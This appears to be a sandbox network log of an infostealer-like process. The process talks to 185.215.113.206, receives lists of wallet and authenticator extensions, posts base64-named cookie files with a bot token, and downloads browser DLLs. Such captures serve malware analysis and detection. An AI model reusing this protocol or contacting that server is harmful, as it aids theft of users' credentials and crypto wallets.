Dec 7, 2024 12:59:13.143942118 CET	1236	IN	Data Raw: 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 Data Ascii: U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWN
Dec 7, 2024 12:59:13.143954992 CET	448	IN	Data Raw: 63 47 56 76 61 32 4a 70 61 32 68 6d 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 46 79 64 47 6c 68 62 69 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d Data Ascii: cGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFR
Dec 7, 2024 12:59:13.144859076 CET	1236	IN	Data Raw: 4d 58 77 77 66 44 42 38 52 55 39 54 49 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 62 32 56 73 61 6d 52 73 5a 48 42 75 62 57 52 69 59 32 68 76 62 6d 6c 6c 62 47 6c 6b 5a 32 39 69 5a 47 52 6d 5a 6d 5a 73 59 57 78 38 4d 58 77 77 66 44 Data Ascii: MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV0aGVudGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGprYmxiY29ibHwxfDB8MHxCaXR3YXJkZW58bm5nY2Vja2JhcGViZmltbmxuaWlpYWhrYW5kY2xibGJ8MXwwfDB8S2VlUGFzc1hDfG9
Dec 7, 2024 12:59:13.144886017 CET	1236	IN	Data Raw: 62 47 78 6c 64 48 78 6d 61 57 6c 72 62 32 31 74 5a 47 52 69 5a 57 4e 6a 59 57 39 70 59 32 39 6c 61 6d 39 75 61 57 46 74 62 57 35 68 62 47 74 6d 59 58 77 78 66 44 42 38 4d 48 78 46 59 33 52 76 49 46 64 68 62 47 78 6c 64 48 78 69 5a 32 70 76 5a 33 Data Ascii: bGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGV
Dec 7, 2024 12:59:13.151669979 CET	592	IN	Data Raw: 61 47 4e 73 5a 33 77 78 66 44 42 38 4d 48 78 43 59 57 4e 72 63 47 46 6a 61 79 42 58 59 57 78 73 5a 58 52 38 59 57 5a 73 61 32 31 6d 61 47 56 69 5a 57 52 69 61 6d 6c 76 61 58 42 6e 62 47 64 6a 59 6d 4e 74 62 6d 4a 77 5a 32 78 70 62 32 5a 38 4d 58 Data Ascii: aGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVB
Dec 7, 2024 12:59:13.153211117 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJDHIDBFBFHIJKFHCGIE Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 2d 2d 0d 0a Data Ascii: ------JJDHIDBFBFHIJKFHCGIEContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------JJDHIDBFBFHIJKFHCGIEContent-Disposition: form-data; name="message"fplugins------JJDHIDBFBFHIJKFHCGIE--
Dec 7, 2024 12:59:13.597419024 CET	335	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:13 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Dec 7, 2024 12:59:13.620923996 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFBGCFCFHCFHIECAEHDH Host: 185.215.113.206 Content-Length: 7243 Connection: Keep-Alive Cache-Control: no-cache
Dec 7, 2024 12:59:13.621223927 CET	7243	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 46 42 47 43 46 43 46 48 43 46 48 49 45 43 41 45 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 Data Ascii: ------BFBGCFCFHCFHIECAEHDHContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------BFBGCFCFHCFHIECAEHDHContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Dec 7, 2024 12:59:14.585624933 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 7, 2024 12:59:15.123838902 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 7, 2024 12:59:15.566898108 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:15 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Dec 7, 2024 12:59:15.567049980 CET	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49743	185.215.113.206	80	6564	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 12:59:25.658890963 CET	621	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDBGDGCGDAKFIDGIDBF Host: 185.215.113.206 Content-Length: 419 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 [TRUNCATED] Data Ascii: ------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------IJDBGDGCGDAKFIDGIDBF--
Dec 7, 2024 12:59:27.485055923 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 7, 2024 12:59:27.547545910 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDAFIJJECFHJJKFCAKJ Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="file"------EHDAFIJJECFHJJKFCAKJ--
Dec 7, 2024 12:59:28.483002901 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49788	185.215.113.206	80	6564	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 12:59:41.546545029 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHD Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="file"------JEBKEHJJDAAAAKECBGHD--
Dec 7, 2024 12:59:43.402873993 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 7, 2024 12:59:43.743809938 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 7, 2024 12:59:44.193429947 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:43 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Dec 7, 2024 12:59:44.193535089 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}U
Dec 7, 2024 12:59:44.193963051 CET	1236	IN	Data Raw: 10 8b 4d 0c 85 ff 74 22 f2 0f 10 07 f2 0f 11 80 30 01 00 00 eb 28 68 05 e0 ff ff e8 7f 0b 08 00 83 c4 04 b8 ff ff ff ff eb 26 c7 80 34 01 00 00 a6 a6 a6 a6 c7 80 30 01 00 00 a6 a6 a6 a6 6a 10 56 6a 00 6a 00 52 51 50 e8 3f 96 06 00 83 c4 1c 5e 5f Data Ascii: Mt"0(h&40jVjjRQP?^_]USWVhO?t081tkEU]Mt0%h1<40jRjjPQWt8^
Dec 7, 2024 12:59:44.194204092 CET	1236	IN	Data Raw: 0f 84 8d 02 00 00 89 54 24 34 89 44 24 30 89 f8 83 e0 f8 50 e8 88 06 08 00 83 c4 04 85 c0 0f 84 7c 02 00 00 89 c3 89 f8 c1 ef 03 8d 4f ff 89 4c 24 38 50 56 53 e8 27 07 08 00 83 c4 0c f2 0f 10 03 f2 0f 11 44 24 40 8d 04 3f 83 c0 fe 8d 04 40 89 c1 Data Ascii: T$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$\|$ L$$
Dec 7, 2024 12:59:44.194215059 CET	248	IN	Data Raw: 1c ff 75 18 53 50 56 8d 45 e0 50 e8 b4 fa ff ff 83 c4 18 89 c7 85 ff 0f 85 6f 01 00 00 b9 01 e0 ff ff 39 5d dc 0f 85 53 01 00 00 8b 55 e0 0f ca b8 a6 59 59 a6 29 d0 81 c2 5a a6 a6 59 09 c2 0f b6 45 e4 0f b6 4d e5 c1 e0 10 c1 e1 08 09 c1 0f b6 45 Data Ascii: uSPVEPo9]SUYY)ZYEME]M)19DEEE\|0)U\|2!!)]\|3)\|3!)}\|7
Dec 7, 2024 12:59:44.194638014 CET	1236	IN	Data Raw: 21 d7 b8 05 00 00 00 29 c8 c1 f8 1f f7 d0 8b 55 1c 80 7c 32 f2 01 19 db 09 c3 b8 06 00 00 00 29 c8 c1 f8 1f 80 7c 32 f1 01 f7 d0 19 d2 09 c2 21 da 21 fa b8 07 00 00 00 29 c8 c1 f8 1f f7 d0 8b 4d 1c 80 7c 31 f0 01 19 c9 09 c1 85 ca 74 2f 8b 45 10 Data Ascii: !)U\|2)\|2!!)M\|1t/EU;U]w"1E9t:RVP -:]QsE9uSjPEtSP\M1$^_[]USWVut:}t$FHjS
Dec 7, 2024 12:59:44.195086002 CET	1236	IN	Data Raw: 08 8b 55 18 8b 4d 14 8b 5d 0c 8b 75 08 8b 3e 8b 46 04 39 d8 74 3a 8d 4e 08 8b 56 08 c7 46 08 00 00 00 00 85 ff 89 4d ec 89 55 f0 74 48 8b 48 0c ff 15 00 80 0a 10 6a 01 57 ff d1 83 c4 08 68 0c 01 00 00 6a 00 56 e8 34 fc 07 00 83 c4 0c eb 25 85 ff Data Ascii: UM]u>F9t:NVFMUtHHjWhjV4%tUVPdnFEFEF^Kt=Uuu#t>t FHjWEM1^_[]USWVu>
Dec 7, 2024 12:59:44.195095062 CET	248	IN	Data Raw: 00 00 8d bd f0 fe ff ff 68 00 01 00 00 68 20 21 08 10 89 b5 ec fe ff ff 56 e8 cf f7 07 00 83 c4 0c bb 00 01 00 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 8b 75 0c 56 ff 75 08 57 e8 ac f7 07 00 83 c4 0c 01 f7 29 f3 39 f3 77 e8 53 ff 75 08 57 e8 Data Ascii: hh !Vf.@uVuW)9wSuWT>\>=t%>>fM1^_[]U}th
Dec 7, 2024 12:59:44.195498943 CET	1236	IN	Data Raw: 07 00 83 c4 08 5d c3 cc cc cc cc cc 55 89 e5 56 8b 75 1c 8b 45 14 39 f0 73 14 68 03 e0 ff ff e8 3b f6 07 00 83 c4 04 b8 ff ff ff ff eb 16 8b 55 0c 8b 4d 08 56 ff 75 18 50 ff 75 10 e8 0b 00 00 00 83 c4 10 5e 5d c3 cc cc cc cc cc 55 89 e5 53 57 56 Data Ascii: ]UVuE9sh;UMVuPu^]USWV4MEE9EshyU}]E}}aM}$7$7u2M$E}
Dec 7, 2024 12:59:44.195882082 CET	1236	IN	Data Raw: f2 17 66 0f 6f 2d e0 20 08 10 66 0f fe d5 f3 0f 5b d2 66 0f 70 e1 f5 66 0f f4 ca 66 0f 70 d2 f5 66 0f f4 d4 66 0f 6f e0 66 0f fe 25 00 21 08 10 66 0f 70 c9 e8 66 0f 70 d2 e8 66 0f 62 ca 66 0f 6e 54 07 04 66 0f 60 d3 66 0f 61 d3 66 0f eb cf 66 0f Data Ascii: fo- f[fpffpffof%!fpfpfbfnTf`faffrf[fpffpffpfpfbff!~sMEMEUxEUMfEMUTFtFM
Dec 7, 2024 12:59:44.202917099 CET	248	IN	Data Raw: 4d cc 8b 45 e8 8b 55 ec 01 d0 83 c0 03 0f b6 c0 8b 55 f0 0f b6 14 02 00 d3 0f b6 f3 8b 7d f0 8a 34 37 8b 7d f0 88 34 07 8b 45 f0 88 14 30 00 d6 0f b6 c6 8b 55 f0 0f b6 04 02 c1 e0 10 09 c8 8b 4d e8 8b 55 ec 01 d1 83 c1 04 0f b6 c9 8b 55 f0 0f b6 Data Ascii: MEUU}47}4E0UMUU}47}4M1uU3UMEM}}Eu;uUM}Et}E
Dec 7, 2024 12:59:45.664434910 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 7, 2024 12:59:46.107101917 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:45 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
